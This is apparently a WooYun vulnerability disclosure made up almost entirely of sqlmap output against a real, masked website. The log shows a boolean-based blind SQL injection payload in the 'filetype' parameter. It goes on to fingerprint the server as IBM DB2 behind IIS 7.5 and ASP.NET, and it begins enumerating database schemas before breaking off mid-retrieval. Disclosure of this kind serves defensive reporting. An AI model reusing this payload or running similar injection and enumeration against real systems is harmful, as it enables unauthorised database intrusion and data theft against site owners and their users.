WooYun.org

http://**.**.**.**/account/getxytg?filetype=G

GET parameter 'filetype' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: filetype (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: filetype=G' AND 7406=7406 AND 'PPbT'='PPbT
---
[15:49:14] [INFO] testing MySQL
[15:49:14] [WARNING] the back-end DBMS is not MySQL
[15:49:14] [INFO] testing Oracle
[15:49:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[15:49:36] [WARNING] the back-end DBMS is not Oracle
[15:49:36] [INFO] testing PostgreSQL
[15:49:36] [WARNING] the back-end DBMS is not PostgreSQL
[15:49:36] [INFO] testing Microsoft SQL Server
[15:49:36] [WARNING] the back-end DBMS is not Microsoft SQL Server
[15:49:36] [INFO] testing SQLite
[15:49:36] [WARNING] the back-end DBMS is not SQLite
[15:49:36] [INFO] testing Microsoft Access
[15:49:36] [WARNING] the back-end DBMS is not Microsoft Access
[15:49:36] [INFO] testing Firebird
[15:49:37] [WARNING] the back-end DBMS is not Firebird
[15:49:37] [INFO] testing SAP MaxDB
[15:49:37] [WARNING] the back-end DBMS is not SAP MaxDB
[15:49:37] [INFO] testing Sybase
[15:49:37] [WARNING] the back-end DBMS is not Sybase
[15:49:37] [INFO] testing IBM DB2
[15:49:37] [INFO] confirming IBM DB2
[15:49:41] [INFO] the back-end DBMS is IBM DB2
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: IBM DB2
[15:49:41] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
[15:49:41] [INFO] fetching database (schema) names
[15:49:41] [INFO] fetching number of databases
[15:49:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:49:41] [INFO] retrieved: 13
[15:49:43] [INFO] retrieved:
[15:50:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
o
[15:50:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
vm